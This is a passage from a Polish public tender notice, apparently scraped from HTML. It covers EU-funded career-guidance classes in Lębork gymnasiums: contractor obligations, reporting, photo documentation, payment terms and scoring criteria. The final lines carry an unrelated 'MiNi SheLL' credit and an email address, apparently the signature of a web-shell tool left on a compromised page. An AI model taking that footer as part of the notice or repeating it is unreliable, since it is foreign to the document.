na celu podniesienie efektywności realizowanych zajęć (m.in. czy Wykonawca będzie miał przygotowaną prezentację multimedialną, czy w trakcie spotkania odbędzie się pokaz umiejętności - tzw. żywe lekcje, czy będzie wykorzystany ubiór związany 
z wykonywaniem konkretnego zawodu, czy uczestnicy otrzymają materiały dodatkowe, np. ulotki, przedmioty związane z konkretnym zawodem, itp.) -  liczba form dodatkowych podlega ocenie.
5.	Zamawiający zastrzega sobie (w związku z finansowaniem ze środków unijnych) oraz instytucjom upoważnionym do przeprowadzenia kontroli, prawo wglądu do dokumentów Wykonawcy związanych z realizowaniem zamówienia, w tym dokumentów finansowych. Zamawiający zastrzega również, iż ma prawo do kontroli przeprowadzanych zajęć.
6.	Usługi należy przeprowadzić w dni robocze dla: Gimnazjum 1, Gimnazjum 2 oraz Zespołu Szkół nr 3 (gimnazjum) w Lęborku, w trakcie godzin lekcyjnych, również po obowiązkowych godzinach lekcyjnych. Terminy i godziny dostosowane będą do najbardziej pożądanych przez odbiorców. 
7.	Wykonawca zobowiązuje się do prawidłowego i systematycznego prowadzenia dokumentacji projektu oraz comiesięcznego przekazywania sprawozdań w formie elektronicznej lub papierowej na adres a.lawniczak@www.lebork.pl o stanie realizacji planu zajęć, w tym ilości zrealizowanych godzin.
8.	Harmonogram zajęć należy ustalić z dyrekcją szkół. Zaakceptowane przez dyrektorów harmonogramy należy przedstawić Zamawiającemu w ciągu 10 dni po podpisaniu umowy.
9.	Zamawiający udostępni Wykonawcy nieodpłatnie pomieszczenia niezbędne do wykonania zamówienia. Materiały papiernicze i inne konieczne do realizacji warsztatów Wykonawca zapewni we własnym zakresie. 
10.	W ramach projektu nie przewiduje się przyznawania uczestnikom stypendiów i zwrotów kosztów dojazdu. 
11.	Wykonawca ponosi pełną odpowiedzialność za uczniów w czasie trwania indywidualnego doradztwa.
12.	Wykonawca jest odpowiedzialny za jakość oferowanych usług, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia.
13.	Wymagana jest należyta staranność przy realizacji zobowiązań umowy.
14.	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę i uczestników lub uczestniczki podczas realizacji przedmiotu zamówienia.
15.	Wykonawca zobowiązany jest również do:
- tworzenia list obecności na zajęciach, 
- sporządzania dokumentacji fotograficznej ze zrealizowanych działań - minimum 3 zdjęcia z każdych zajęć (w każdej szkole, w każdej grupie) do końca każdego miesiąca i przesyłania ich na adres: a.lawniczak@www.lebork.pl lub dostarczania osobiście na płycie CD/DVD Zamawiającemu
- odpowiedniego oznaczenia wszystkich miejsc i dokumentów bezpośrednio związanych z realizacją zajęć pozaszkolnych, tj. korespondencji dotyczącej Projektu i wszystkich innych dokumentów z nim związanych wychodzących od Wykonawcy logotypów Unii Europejskiej oraz Programu Operacyjnego Kapitał Ludzki wraz z zamieszczeniem napisu o współfinansowaniu przedmiotu zamówienia ze środków Unii Europejskiej zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki (zgodnie z wytycznymi w zakresie informacji i promocji, które zamieszczone są na stronie internetowej: www.efs.gov.pl).  Dodatkowo wszystkie dokumenty i materiały muszą zostać oznaczone logotypem miasta (Wybierz Lębork), który zostanie udostępniony przez Zamawiającego po podpisaniu umowy
16. Wykonawcy za wykonanie przedmiotu umowy przysługuje wynagrodzenie zgodne 
z przedstawioną ofertą. Zapłata nastąpi w terminie, nie później niż 30 dni od dnia doręczenia Zamawiającemu prawidłowo wystawionej faktury/rachunku oraz innej wymaganej przez Zamawiającego dokumentacji:
a)	listy obecności uczestników (każda grupa osobna lista)
b)	protokół odbioru zawierający okres realizacji, tematy przeprowadzonych zajęć, godziny ich odbywania i liczbę zrealizowanych godzin,
c)	zestawienie przeprowadzonych zajęć (osobne dla każdej szkoły, z podziałem na grupy wraz z datami poszczególnych spotkań)
d)	dokumentację fotograficzną ze zrealizowanych warsztatów - minimum 3 zdjęcia 
z każdych zajęć (w każdej szkole, w każdej grupie)
Wypłata wynagrodzenia nastąpi nie wcześniej niż po otrzymaniu transzy dotacji, zgodnie z harmonogramem płatności stanowiącym załącznik do umowy o dofinansowanie projektu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Propozycje dodatkowych form mających na celu podniesienie efektywności realizowanych zajęć - 30</li>
<li>3. Liczba zrealizowanych przez Wykonawcę usług w zakresie prowadzenia zajęć edukacyjnych wśród uczniów szkół podstawowych i gimnazjów - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com